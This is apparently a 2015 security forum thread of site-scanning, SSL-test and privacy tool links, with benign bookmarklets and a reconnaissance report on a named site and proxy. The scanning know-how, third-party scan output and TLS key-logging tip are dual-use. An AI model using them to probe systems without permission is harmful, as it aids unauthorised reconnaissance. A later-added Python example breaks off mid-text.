A test site for mobile friendliness of webpages, also rather interesting for folks like Polonus, volunteer website analyst regarding insecurities on sites. Enjoy this test site, folks, enjoy: http://mobilefriendlytest.website/index.php

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on July 07, 2015, 05:51:17 PM
To save offline and analyze - WinHTTrack Website Copier 3.48-21
(To report bugs and problems to us)

Development:
Interface (Windows): Xavier Roche
Spider: Xavier Roche
JavaParserClasses: Yann Philippot

(C)1998-2003 Xavier Roche and other contributors
MANY THANKS for Dutch translations to:
Rudi Ferrari (Wyando@netcologne.de)

Visit our web page:
http://www.httrack.com

Combined with analyzer SensePost Wikto 2.1. http://sensepost-wikto.software.informer.com/download/
Wikto is Nikto for Windows - but with a couple of fancy extra features including fuzzy logic error code checking, a back-end miner, Google-assisted directory mining and real time HTTP request/response monitoring.

Wikto is not a web application scanner. It is totally unaware of the application (if any) that’s running on the web site. Wikto will not look for SQL injection problems, authorization problems etc. on a web site. It is also not a network level scanner – so it won’t try to find open ports, or see if the web site is properly firewalled. Wikto rather operates between these two levels – it tries to, for instance, find interesting directories and files on the web site, it looks for sample scripts that can be abused or finds known vulnerabilities in the web server implementation itself.

Enjoy, enjoy, but be aware of all the legal implications for your country when using the software:
only for websites where you have explicit written permission to scan (e.g. websites you own);
in all other circumstances do not scan any website directly - use so-called third-party cold reconnaissance scanning.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 12, 2015, 10:22:39 PM
Hi my good friends,

Who is using this?
Adopted as a userscript in Tampermonkey -> http://downyours.org/?filters_484a7c06c4b8474f8853a42eb790a0dee87fc3f8b64c485cb9ce6832b35dc67b

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 14, 2015, 10:49:05 PM
Make your own bookmarklets and drag the links created onto your bookmark toolbar in the browser.
Create the bookmarklet yourself here http://mrcoles.com/bookmarklet/ with this code to remove bloat from a page
Code: [Select]
javascript:(function(){
  /* Replace every <object>, <embed>, <applet> and third-party <iframe> in the page
     (and in its same-origin frames) with a <del> placeholder of the same size. */
  function R(w){
    try{
      var d=w.document,j,i,t,T,N,b,r=1,C;
      for(j=0;t=["object","embed","applet","iframe"][j];++j){
        T=d.getElementsByTagName(t);
        for(i=T.length-1;(i+1)&&(N=T[i]);--i)
          /* for iframes recurse first; a cross-origin frame throws and is replaced instead */
          if(j!=3||!R((C=N.contentWindow)?C:N.contentDocument.defaultView)){
            b=d.createElement("div");
            b.style.width=N.width;b.style.height=N.height;
            b.innerHTML="<del>"+(j==3?"third-party "+t:t)+"</del>";
            N.parentNode.replaceChild(b,N);
          }
      }
    }catch(E){r=0}
    return r
  }
  R(self);
  var i,x;for(i=0;x=frames[i];++i)R(x)
})()
  and this code to rewrite redirects
Code: [Select]
javascript:(function(){var k,x,t,i,j,p; for(k=0;x=document.links[k];k++){t=x.href.replace(/[%]3A/ig,':').replace(/[%]2f/ig,'/');i=t.lastIndexOf('http');if(i>0){ t=t.substring(i); j=t.indexOf('&'); if(j>0)t=t.substring(0,j); p=/https?\:\/\/[^\s]*[^.,;'">\s\)\]]/.exec(unescape(t)); if(p) x.href=p[0]; } else if (x.onmouseover&&x.onmouseout){x.onmouseover(); if (window.status && window.status.indexOf('://')!=-1)x.href=window.status; x.onmouseout(); } x.onmouseover=null; x.onmouseout=null; }})();
Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: Para-Noid on July 14, 2015, 11:14:52 PM
https://sitecheck.sucuri.net/?utm_campaign=SiteCheck&utm_medium=social&utm_source=googleplus
https://www.youtube.com/watch?v=su6fAaBAULg&feature=autoshare
Title: Re: Tests and other Media topics
Post by: polonus on July 16, 2015, 02:31:53 PM
Validate your SSL connection strength: https://calomel.org/firefox_ssl_validation.html
You could combine this with the Netcraft extension report.
And of course a Qualys SSL scan: https://www.ssllabs.com/ssltest
or the other tests as given in this thread earlier.

polonus
Title: Re: Tests and other Media topics
Post by: Para-Noid on July 21, 2015, 05:40:56 PM
How fast is your site? You can test here the performance of any of your sites from across the globe.

https://performance.sucuri.net/?utm_campaign=Performance%20Tool&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: bob3160 on July 21, 2015, 05:51:05 PM
How fast is your site? You can test here the performance of any of your sites from across the globe.

https://performance.sucuri.net/?utm_campaign=Performance%20Tool&utm_medium=social&utm_source=googleplus (https://performance.sucuri.net/?utm_campaign=Performance%20Tool&utm_medium=social&utm_source=googleplus)
Thanks :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1437493822213-53383.png)
Title: Re: Tests and other Media topics
Post by: polonus on July 28, 2015, 06:15:50 PM
Here on the Avast official support forums various users use all sorts of website scan sites.
The results of such scans may set us at ease or
they may encourage us to just look again or avoid visiting a particular website, url, uri....

As our friend Para-Noid has taught us: "You can only trust what you have tested yourself".

And as his forum friend I'd wholeheartedly agree with this Para-Noid's credo.
It is a home-ringing truth, my dear avast friends.

Now we may ask in all earnestness: "Who can we really still trust online these days?".

We have bookmarklets to detect whether a site has jQuery and what (vulnerable) version.
On this fine page we also find fine vulnerability scanners for WP and Joomla CMS results
on websites and more scans and tools: https://hackertarget.com

Another interesting website to find out about what technologies are being used
on a particular website can be found here:
http://pagexray.com/site/  x      for x give in the domain of the site you wanna check.

enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 28, 2015, 07:00:29 PM
Various handy utilities to be found here: http://www.nothink.org/utilities.php

Links presented as is. Only to be used when given pertinent written permission to test
or to test on your own website and scripts.

Never go to websites directly; always know your legal position when using scans; if not certain, refrain from using,
like with Dazzlepod scan results or Qualys server scan results. The info gained there is not to be used against those scanned.
Qualys scan results are not to be given.

You are never to use info gained by cold reconnaissance third-party scanning against a particular website/domain which you do not own. Sometimes you can give a certain scan link (broken), but are not to give the scan result data.

An interesting example of all you can find at this address: http://www.danstools.com/javascript-obfuscate/
Know that in malware loads of so-called pseudo-script and script obfuscation is used to mislead detection,
so whenever we experience obfuscated script it should be a reason to be alert.
As Para-Noid states: "You can only fully trust what you have tested yourself".

enjoy, my good friends, enjoy,

Damian
Title: Re: Tests and other Media topics
Post by: polonus on July 29, 2015, 06:18:02 PM
A nice Chrome extension to prevent type-behavioral profiling, Keyboard Privacy, one you should have:
https://chrome.google.com/webstore/detail/keyboard-privacy/aoeboeflhhnobfjkafamelopfeojdohk

pol

P.S. Where you need a secure connection and it does not matter, your bank website for instance, disable the extension.
So toggle to `on´ when privacy goes over security, `off´ when security goes over privacy.

Keyboard Privacy seems the extension to save Tor users from being de-anonymized by their typing profile.
The cat-and-mouse game between protection and monitoring forces goes on and on...


Damian
Title: Re: Tests and other Media topics
Post by: polonus on July 29, 2015, 06:27:24 PM
Create your own bookmarklets using JQuery: http://benalman.com/code/test/jquery-run-code-bookmarklet
and http://benalman.com/projects/run-jquery-code-bookmarklet/

A fine javascript bookmarklet generator is to be found here: http://mrcoles.com/bookmarklet/

To check a webpage for JQuery, look for it here and drag onto the bookmark bar: http://www.learningjquery.com/2009/04/better-stronger-safer-jquerify-bookmarklet

polonus
Title: Re: Tests and other Media topics
Post by: Para-Noid on July 29, 2015, 08:04:37 PM
Analyzing a Facebook Clickbait Worm

https://blog.sucuri.net/2015/06/analyzing-a-facebook-clickbait-worm.html?utm_campaign=Learn%20how%20to%20avoid%20becoming%20a%20victim%20of%20Facebook%20ClickBait%20Blogpost&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: polonus on July 30, 2015, 12:58:53 PM
For VPN users of Chrome, prevent leaking non-public IP addresses with this extension: https://chrome.google.com/webstore/detail/webrtc-network-limiter/npeicpdbkakmehahjeeohfdhnlpdklia
Another protection against this read-out via JavaScript methods is the use of NoScript, uMatrix, and Tor-Guard.
To disable it in the Google Chrome browser settings, enter in the address bar "chrome://flags/" and set "Disable WebRTC device enumeration" to on. In Firefox, in the address bar enter "about:config" and then set "media.peerconnection.enabled" to "false". Or, as said, use the versatile overall protection of the NoScript extension in Firefox and uMatrix in Google Chrome.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 30, 2015, 02:14:32 PM
Interesting about what your browser knows about you:
https://isc.sans.edu/forums/diary/Psst+Your+Browser+Knows+All+Your+Secrets/16415/

link article author = Sally Vandeven

Curious ->  just open a command prompt and run:

set SSLKEYLOGFILE=c:\sslKeyLogFile.txt

Know that Bitdefender products may ruin "SSL" through installing an all-purpose root certificate, so one can no longer see the validation path and it also is not checking for revocation.
This can be disabled by locally deleting the root CA and disabling the SSL scan option, so Bitdefender can no longer interfere,
but for users that want to enforce SSL (like with HTTPS Everywhere) this is no option.
Forum users that use Bitdefender, and I know some here that are, should be aware of such facts.

Avast has a far better SSL-scanning feature  ;D as we know from avast team members here.

We know Mozilla NSS has the mentioned feature; MS might have it also,
but then, if it was/is, the feature never was known to the public.
Info-credits go to Secu_jay.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 30, 2015, 03:14:15 PM
Is Microsoft's Edge browser as safe as the Google Chrome browser?
Trend Micro says yes, both Edge and Chrome are more secure than firefox is.
Re: http://blog.trendmicro.com/trendlabs-security-intelligence/windows-10s-new-browser-microsoft-edge-improved-but-also-new-risks
Title: Re: Tests and other Media topics
Post by: polonus on July 30, 2015, 06:07:50 PM
Whenever you have privacy concerns, try this free solution, Tails: https://tails.boum.org/
Why you should do this: https://tails.boum.org/
Why: http://arstechnica.com/gadgets/2013/10/googles-iron-grip-on-android-controlling-open-source-by-any-means-necessary/

polonus

P.S. Tails is better protected from type profiling to de-anonymize Tor users with the Keyboard Privacy plug-in.

D
Title: Re: Tests and other Media topics
Post by: polonus on July 30, 2015, 07:00:09 PM
Yes, and when you live in the EU install CookiesOK when you stumble upon a cookie wall: https://chrome.google.com/webstore/detail/cookiesok/afmkbjoakcacgljcdccofbffloabfbni
or https://addons.mozilla.org/firefox/addon/cookiesok/
or https://addons.opera.com/en/extensions/details/cookiesok

pol
Title: Re: Tests and other Media topics
Post by: polonus on August 04, 2015, 02:37:36 PM
Coalition announcing new DNT standards: https://www.eff.org/press/releases/coalition-announces-new-do-not-track-standard-web-browsing - The new DNT standard is not an ad- or tracker-blocker, but it works in tandem with these technologies.
As it is a voluntary measure your privacy is depending on what certain parties honor and what not. I even suspect ABP to be more commercially inclined (showing "unobtrusive" ads they were paid to let through) than purely being a tracking blocker.

Nowhere I read about new tracking procedures like canvas printing tracking for which I use a special extension.
In my opinion the new DNT standards do nothing against malvertising and SEO spam (Google cannot even stop it with a big hidden team of experts trying to stem it in, it is an endless exercise that does not seem to work somehow).
I'd rather use uBlock Origin than ABP, and I use Anti-Adblock Killer 8.2.

With DuckDuckGo I do not see Avast Online Security info, I do not see Bitdefender TrafficLight info, DrWeb URL checker info (I can scan that url separately, but that is not what I want), I only see WOT results. And with DuckDuckGo Extended running from Tampermonkey I haven't the same functionality as on the Google search page or Ixquick or Startpage. With these alternatives I miss the so-called "road signs" what destinations to avoid. Although I participate on WOT as "luntrus", having only these results shown on a search page is a bit meagre to my liking.

I think the whole thing is purely cosmetic camouflage, why they have no deal on blocking ads from Windows gadgets for instance or using adblockers on Google's Android OS. There personalized ad-targeting has won and we see EFF's full compliance, at least I haven't heard a word of protest, as there we cannot even stop tracking nor protect/block when such ads get malvertised. Malvertising campaigns are the main and only reason polonus wants to be able to block all ads.
It would be better if they could have made a model where users pay to surf absolutely ad-free.

The best solution so far is using script blockers like NoScript and RequestPolicy in Firefox to toggle what you wanna block per se. In Google Chrome I have uMatrix where I can selectively block cookie, css, picture, plug-in, script, XHR, frame, others - here on this page for avast.com and for the present domain with avast.com, google-analytics com and www.google-analytics com. I can block 9 cookies, 6 images, 2 scripts from running. In Chrome I also have the StopTracking extension running.

polonus


P.S. What is funny is that on a link where the new DNT policy was discussed, e.g. http://webwereld.nl/markttrends/87656-adblock-en-duckduckgo-brengen-echte-do-not-track# I had to block a link to -http://track.adform.net/
and encountered this: http://toolbar.netcraft.com/site_report?url=http://script.leadboxer.com

How they could come to DNT when all of the Internet is just about this one activity is beyond me. First you totally surrender and then you start to scream no-one respects your privacy anymore.  :(

Damian
Title: Re: Tests and other Media topics
Post by: mchain on August 04, 2015, 07:40:08 PM
Coalition announcing new DNT standards: https://www.eff.org/press/releases/coalition-announces-new-do-not-track-standard-web-browsing - The new DNT standard is not an ad- or tracker-blocker, but it works in tandem with these technologies.
As it is a voluntary measure your privacy is depending on what certain parties honor and what not. I even suspect ABP to be more commercially inclined (showing "unobtrusive" ads they were paid to let through) than purely being a tracking blocker.

Nowhere I read about new tracking procedures like canvas printing tracking for which I use a special extension.
In my opinion the new DNT standards do nothing against malvertising and SEO spam (Google cannot even stop it with a big hidden team of experts trying to stem it in, it is an endless exercise that does not seem to work somehow).
I'd rather use uBlock Origin than ABP, and I use Anti-Adblock Killer 8.2.

With DuckDuckGo I do not see Avast Online Security info, I do not see Bitdefender TrafficLight info, DrWeb URL checker info (I can scan that url separately, but that is not what I want), I only see WOT results. And with DuckDuckGo Extended running from Tampermonkey I haven't the same functionality as on the Google search page or Ixquick or Startpage. With these alternatives I miss the so-called "road signs" what destinations to avoid. Although I participate on WOT as "luntrus", having only these results shown on a search page is a bit meagre to my liking.

I think the whole thing is purely cosmetic camouflage, why they have no deal on blocking ads from Windows gadgets for instance or using adblockers on Google's Android OS. There personalized ad-targeting has won and we see EFF's full compliance, at least I haven't heard a word of protest, as there we cannot even stop tracking nor protect/block when such ads get malvertised. Malvertising campaigns are the main and only reason polonus wants to be able to block all ads.
It would be better if they could have made a model where users pay to surf absolutely ad-free.

The best solution so far is using script blockers like NoScript and RequestPolicy in Firefox to toggle what you wanna block per se. In Google Chrome I have uMatrix where I can selectively block cookie, css, picture, plug-in, script, XHR, frame, others - here on this page for avast.com and for the present domain with avast.com, google-analytics com and www.google-analytics com. I can block 9 cookies, 6 images, 2 scripts from running. In Chrome I also have the StopTracking extension running.

polonus


P.S. What is funny is that on a link where the new DNT policy was discussed, e.g. http://webwereld.nl/markttrends/87656-adblock-en-duckduckgo-brengen-echte-do-not-track# I had to block a link to -http://track.adform.net/
and encountered this: http://toolbar.netcraft.com/site_report?url=http://script.leadboxer.com

How they could come to DNT when all of the Internet is just about this one activity is beyond me. First you totally surrender and then you start to scream no-one respects your privacy anymore.  :(

Damian
Agree with you there.  Of note is the DuckDuckGo webpage: no one seems to support anything there other than WOT for rating purposes, on all sites displayed there, not even Avast Online Security.  Could be that this website is doing what it says it is doing, not allowing invasive privacy tracking to occur from within it, as it is general knowledge every privacy extension you put on your browser can report to the creator of that extension applet without your explicit user interaction or consent.

But just moving off that page is no guarantee of continued privacy when going to another site off of it.  DuckDuckGo also actively moderates what their users can see on it as well.

Notwithstanding that, for my purposes, it works well and is safer to use than Google, imo.  DNT is not what it says it is.
Title: Re: Tests and other Media topics
Post by: Para-Noid on August 04, 2015, 08:12:42 PM
Common Website Security Terminology Defined

https://blog.sucuri.net/2015/07/common-website-security-terminology-defined.html?utm_campaign=Common%20Website%20Security%20Terminology%20Defined%20Blogpost&utm_medium=social&utm_source=googleplus

WP-CLI Guide: Secure WordPress Backup and Update

https://blog.sucuri.net/2015/07/wp-cli-guide-secure-wordpress-backup-update.html?utm_campaign=WP-CLI%20Guide%3A%20Secure%20WordPress%20Backup%20and%20Update&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: polonus on August 05, 2015, 12:11:16 PM
A question to the forum users,
Who uses the wonderful protection of uMatrix extension inside Google Chrome or inside Firefox?

It keeps you in full control of where your browser is allowed to connect for all domains, the present domain, and for all third party domains (some domains are blocked as by default like google.analytics etc. etc.) You can toggle for blocking/unblocking per cookie, css, image, plug-in, script, XHR, frame, others. Red is blocked and green is allowed to connect. You can turn the filtering off per website. You can save all temp. changes for a website or delete such temp. settings. Renew the page from inside uMatrix. Visit the logger.
You can set spoofing for agent (on/off), referer spoofing (on/off) and strict HTTPS (on/off). You can delete all temp. changes to the default settings under + or go to the dashboard. You can change settings for visibility, use block lists, use your own permanent and temp. filters. I think it is so versatile anyone can learn to use it and even as per default it gives loads of protection.

Like to hear your reactions,

polonus
Title: Re: Tests and other Media topics
Post by: Lisandro on August 05, 2015, 01:10:00 PM
A question to the forum users,
Who uses the wonderful protection of uMatrix extension inside Google Chrome or inside Firefox?
I use.
Title: Re: Tests and other Media topics
Post by: Para-Noid on August 05, 2015, 11:29:34 PM
The Business of Security: The Nitty Gritty of Running a Multi-Million Dollar Business

http://www.slideshare.net/SucuriSecurity/the-business-of-security-the-nitty-gritty-of-running-a-multimillion-dollar-business?utm_campaign=The%20Business%20of%20Security%3A%20The%20Nitty%20Gritty%20of%20Running%20a%20Multi-Million%20Dollar%20Business%20Slideshare&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2015, 01:39:32 AM
HTML5 Canvas Fingerprinting test: https://www.browserleaks.com/canvas
On the project: https://github.com/Valve/fingerprintjs
See how it is supported in the browser: http://caniuse.com/#search=canvas
Test: http://www.html5accessibility.com/tests/canvas.html
Protection: http://fingerprint.pet-portal.eu/?menu=6  and now also via Privacy Badger extension.

Quite another form of fingerprinting: https://www.grc.com/fingerprints.htm
Domain Name | Certificate Name | EV | Security Certificate's Authentic Fingerprint | Click to view complete certificate chain
forum.avast.com | *.avast.com | — | DF:57:EC:1C:3A:4D:EE:B2:55:46:5F:26:08:0B:8E:92:74:4A:D8:00

Test the uniqueness of your browser and what it reveals: https://panopticlick.eff.org/index.php?action=log&js=yes
See Content Filtering and Proxy Detection in my browser attached.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2015, 01:38:04 PM
Hi folks,
Quote taken from browserleaks
Quote
Disable WebRTC in Chrome
WebRTC in Google Chrome is supported and enabled by default since Chrome version 23 (and based on it, ex. Opera, Vivaldi).

Bad news:

You CAN'T turn off WebRTC on desktop version of Google Chrome, Disable WebRTC flag is available only on Android.

Good news:

There is a Chrome Extension: WebRTC Block.

Extension hides your public IP when you're behind VPN. It will leak only VPN's public IP, but not your real provider IP address! Extension also hides your Local/NAT IP addresses.

Unfortunately, if you're behind proxy but not VPN, WebRTC Block will not help you.

I can't do anything, and no one can. This piece of the periodic table is ****ed by design. So PLEASE stop insulting me on mail and webstore that it's "NOT WORKING !!!" :)

Just use FF. There is no drama.
This is further proof for me that the Google Chrome browser  is one giant tracking machine by default -
Looking at the extension the developer of it states:
Quote
Disable WebRTC in Your Web Browser!
At the moment, there is no way to completely block WebRTC in Google Chrome.

I should say sorry, but I can't just rename the extension.


Google Chrome is putting some individuals at risk here, read: https://productforums.google.com/forum/#!topic/chrome/QN7jleWJawY

But this works, alas not on Android, go to address bar and type chrome://flags/#disable-webrtc

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 08, 2015, 04:04:04 PM
Hi folks,

(Snip)

polonus
More information and a discussion on this topic at:
https://code.google.com/p/chromium/issues/detail?id=333752 (https://code.google.com/p/chromium/issues/detail?id=333752)
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2015, 04:11:34 PM
Are you safe via a VPN, test here : https://www.privacytools.io/webrtc.html
I was secure here: https://frankfurt-s02-i01.cg-dialup.net/go/browse.php?u=https://www.privacytools.io/webrtc.html&b=7&f=norefer
Read here why users should use firefox rather than chrome: https://www.privacytools.io/#webrtc

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 09, 2015, 11:42:58 PM
When you detect website malware every day all of the day, like I do, I'd also like to test a domain for SSL Protocol Support.
We can test here: https://foundeo.com/products/iis-weak-ssl-ciphers/test.cfm?test_domain=m-pathy.com
Nice candidates for weaknesses are to be found here: https://www.eff.org/https-everywhere/atlas/domains/m-pathy.com.html
That is why I haven't set https as per default.
Browser JSGuard is an extension that will alert you when your log-in data go in plain txt over the wire.
For instance what is wrong here: https://www.m-pathy.com/
Well let us start here and that is not encouraging:
HTTP Server: Apache HTTP Server 2.4.10
PHP Version: 5.3.26 (Outdated)

The protocol settings:
Protocol | Status | Recommendation
SSLv2 | SSLv2 is Disabled | SSLv2 is weak and should be disabled. More information.
SSLv3 | SSLv3 is Disabled | Consider disabling SSLv3 to mitigate the POODLE attack. Should be disabled for PCI DSS 3.1 Compliance
TLSv1 | TLSv1 is Enabled | TLSv1 may be enabled for existing implementations, however PCI DSS 3.1 § 2.2.3 states that: SSL and early TLS are not considered strong cryptography and cannot be used as a security control after June 30, 2016. Prior to this date, existing implementations that use SSL and/or early TLS must have a formal Risk Mitigation and Migration Plan in place. Effective immediately, new implementations must not use SSL or early TLS
TLSv1.1 | TLSv1.1 is Enabled | TLSv1.1 may be enabled for existing implementations, however PCI DSS 3.1 § 2.2.3 states that: SSL and early TLS are not considered strong cryptography and cannot be used as a security control after June 30, 2016. Prior to this date, existing implementations that use SSL and/or early TLS must have a formal Risk Mitigation and Migration Plan in place. Effective immediately, new implementations must not use SSL or early TLS. Some assert that the term early TLS includes both TLS 1.0 and 1.1, check with your PCI QSA.
TLSv1.2 | TLSv1.2 is Enabled | TLS 1
Certificate problem for one IP: https://www.ssllabs.com/ssltest/analyze.html?d=m-pathy.com
E-commerce Safety Information
Transaction Protection
Certified SSL is used to encrypt transactions
SSL Issuer: AlphaSSL CA - SHA256 - G2
SSL Expires: 2018-02-19 01:26:54 UTC
See also: http://toolbar.netcraft.com/site_report?url=https://www.m-pathy.com

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 09, 2015, 11:46:53 PM
Most people, unless like you they are looking for malware, hardly ever "run into it" provided they are reasonably protected.
I haven't received a warning about running into a malicious website or an infection in a very, very long time. :)


Title: Re: Tests and other Media topics
Post by: polonus on August 10, 2015, 12:17:26 AM
Hi bob3160,

When you are surfing with Google Chrome you often run into SSL sites that do not have the full green padlock.
You'd never click the yellow triangle showing there is also insecure content on a site that does not go via ssl.  :o
I often still see a lot of sites like this for instance : IEEE Xplore Abstract - Browser JS Guard: Detect... padlock icon
ieeexplore.ieee.org
Alerts (1)
Insecure login (1)
Password will be transmited in clear to http://ieeexplore.ieee.org/servlet/LoginModalController

When the green padlock is missing and I see such red alerts, I investigate, and other users should also hesitate and check what they are going to do there and whether their info is safe going to that site or log-in.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 10, 2015, 12:21:23 AM
(http://www.screencast-o-matic.com/screenshots/u/Lh/1439158816683-7563.png)
It isn't green but I still visit the site. As you know, I don't put my system through all the hoops you do.

Title: Re: Tests and other Media topics
Post by: polonus on August 10, 2015, 12:49:48 AM
Hi bob3160,

It is not about going through hoops, I do all this as a volunteer forum member to detect insecurities and report them to Avast so the Avast team may protect all of their users better and I found quite something up over the last few years.

I am far from expecting the average user to do similar things. This thread is meant for people that are in website scanning, website owners, security analysts, hosters, and a couple of other enthusiasts here on the forums.

I do not say you have to go to sites like I do and with the suspicion and the experience I have stashed at the back of your mind, no-way, that is just for website analysts and other forum users here that like the subject.

But I should like it a lot for the average user to become just a little tad more aware and concerned. Do not just trust all you were being told, because all you are being told is not always the truth where website security is concerned. Our forum member, Para-Noid, would say: "It is secure only what you have tested to be secure!".

Damian
Title: Re: Tests and other Media topics
Post by: polonus on August 10, 2015, 11:02:25 PM
"There is another obscure way of tracking users without using cookies or even Javascript."
Read about this and test here:
"http://lucb1e.com/rp/cookielesscookies/"
This is stopping "this 'phorming": https://www.dephormation.org.uk/index.php?page=81

polonus

P.S. The main reason for this test was to promote self-destructing cookies like with Crunch etc.

D
Title: Re: Tests and other Media topics
Post by: Para-Noid on August 12, 2015, 07:47:45 PM
Persistent XSS Vulnerability in WordPress Explained

https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html?utm_campaign=Persistent%20XSS%20Vulnerability%20in%20WordPress%20Explained%20Blogpost&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: Para-Noid on August 19, 2015, 04:02:26 PM
Ask Sucuri: How does SiteCheck work?

https://blog.sucuri.net/2012/10/ask-sucuri-how-does-sitecheck-work.html?utm_campaign=Ask%20Sucuri%3A%20How%20does%20SiteCheck%20work%3F%20Blogpost&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: Para-Noid on August 19, 2015, 04:03:19 PM
10 Tips to Improve Your Website Security

https://blog.sucuri.net/2015/06/10-tips-to-improve-your-website-security.html?utm_campaign=10%20Tips%20to%20Improve%20Your%20Website%20Security%20Blogpost&utm_medium=social&utm_source=googleplus
Title: Re: Tests and other Media topics
Post by: polonus on August 19, 2015, 04:09:03 PM
Two fine new test links: http://oscarotero.com/embed/demo/index.php?url=
and
http://iframely.com/debug  also available as extension.
and Low Level Site Explorer: http://1col.ru/www.investigue-me.tumblr.com

enjoy, my good friends, enjoy.
Title: Re: Tests and other Media topics
Post by: polonus on September 18, 2015, 10:01:11 PM
Test for the WebRTC IP Leak VPN/Tor IP Test: http://www.japanweb.info/browse.php/GBWhw2bzXIaDEN9sFiADKd5_2FtKHD9Lg_2F4G2TUJ3BpxHczbg_3D/b29/fnorefer/
Nothing showed up.
http://www.japanweb.info/browse.php/UQChm3nl/X8GAD89z/ByIeOcN1/q6HD_2Fr/h9uA_3D_/3D/b29/
Only the IP of the proxy is shown: 108.59.11.116
But we see this proxy could also be abused: https://www.stopforumspam.com/ipcheck/108.59.11.116
abuse on hosted-by.leaseweb.com in Delaware
commonName=server.bind2.com -  OpenSSH 5.3 (protocol 2.0)
0/tcp  open  http     Apache httpd 2.4.12 ((Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4)
| http-methods: Potentially risky methods: TRACE
ssl/http Apache httpd 2.4.12 ((Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
with a defect in delegation handling
Found mail servers with inconsistent reverse DNS entries -> mailfilter2.ocom.com.   2001:1af8:4100:a064::20
Primary nameserver: dns01001.ams1.lswcdn.com.
Concluding the proxy scan result.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 19, 2015, 01:03:06 PM
I tested this code here:
Code: [Select]
<HTML>
<HEAD>
<TITLE>My First Script</TITLE>
</HEAD>

<BODY>
<H1>Let's Script...</H1>
<HR>
<SCRIPT LANGUAGE="JavaScript">
<!--hide from old browsers
// The browser identification lives on the navigator object; the original
// used "chrome.appVersion", which is undefined outside an extension and
// aborts the script, so only the heading above gets rendered.
document.write("This browser is version " + navigator.appVersion)
document.write(" of <B>" + navigator.appName + "</B>.")
//end script hiding -->
</SCRIPT>
</BODY>
</HTML>

here: http://caja.appspot.com/  Rendered result Eval Result Time 361 ms = Let's Script...

(source adopted from Javascript Bible)  ;)


polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 19, 2015, 07:28:38 PM
DNS router checker: https://campaigns.f-secure.com/router-checker/
NO ISSUES WERE FOUND
All is well. Have a nice day!

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on September 19, 2015, 10:02:33 PM
DNS router checker: https://campaigns.f-secure.com/router-checker/ (https://campaigns.f-secure.com/router-checker/)
NO ISSUES WERE FOUND
All is well. Have a nice day!

polonus
No issues found here either but I already knew that from my Avast Network Scan. :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1442692934591-56816.png)
Title: Re: Tests and other Media topics
Post by: polonus on September 22, 2015, 01:58:39 AM
Test for Canvas Fingerprinting here: http://www.browserleaks.com/canvas
Detect it on sites? Re:  https://chrome.google.com/webstore/detail/canvasfingerprintblock/ipmjngkmngdcdpmgmiebdmfbkcecdndc
Who is into this:  CanvasFingerprintBlock
Blocked 2 potential HTML canvas fingerprinting attempts on this page
Prevented a script on https://hackertarget.com from capturing the point (16, 16) on the following 300px × 150px canvas:
Prevented a script on https://hackertarget.com from capturing the following 300px × 150px canvas:
300px × 150px

polonus
Title: Re: Tests and other Media topics
Post by: Simion on September 22, 2015, 04:34:04 AM
Test for Canvas Fingerprinting here: http://www.browserleaks.com/canvas
Detect it on sites? Re:  https://chrome.google.com/webstore/detail/canvasfingerprintblock/ipmjngkmngdcdpmgmiebdmfbkcecdndc
Who is into this:  CanvasFingerprintBlock
Blocked 2 potential HTML canvas fingerprinting attempts on this page
Prevented a script on https://hackertarget.com from capturing the point (16, 16) on the following 300px × 150px canvas:
Prevented a script on https://hackertarget.com from capturing the following 300px × 150px canvas:
300px × 150px

polonus

Greetings Damien:

I have tested this on a linux platform with chromium browser. I have installed the add-on which seems to work properly. But despite reading "How Does It Work" and "Further Reading", I don't understand why being unique and not in their database is a bad thing (red X). Any thoughts?
Title: Re: Tests and other Media topics
Post by: polonus on October 01, 2015, 12:27:57 AM
Examples of SQL and a checker:
http://www.itl.nist.gov/div897/ctg/dm/sql_examples.htm
Mysqli Prepare Statement Checker

This tool is to help debug SQL statements used in mysqli prepare statements. Enter your SQL, flags and variable that you would use in constructing your prepare statement below to see the SQL generated as well as any issues.

SQL:
INSERT INTO STATION VALUES (13, \'Phoenix\', \'AZ\', 33, 112); INSERT INTO STATION VALUES (44, \'Denver\', \'CO\', 40, 105); INSERT INTO STATION VALUES (66, \'Caribou\', \'ME\', 47, 68);
Issues:
More flags than variables. Less placeholders (?) than flags
SQL Query:
INSERT INTO STATION VALUES (13, \'Phoenix\', \'AZ\', 33, 112);
INSERT INTO STATION VALUES (44, \'Denver\', \'CO\', 40, 105);
INSERT INTO STATION VALUES (66, \'Caribou\', \'ME\', 47, 68);

Flags:
isd
 Only use i, s, d or b.   Check tool: http://www.mustbebuilt.co.uk/apps/mysql-prepare-checker/

enjoy, my good friends, enjoy,

polonus
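The checks that tool applies can be reproduced offline. The Python below is an added example (not the tool's code and not from the post): it counts `?` placeholders outside quoted literals, compares them with the type flags and the bound variables, and runs on the post's three literal INSERTs and on the single parameterised INSERT a prepare() call should receive; the issue wording is modelled on the messages quoted above.

```python
"""Offline emulation of a mysqli prepare-statement checker.

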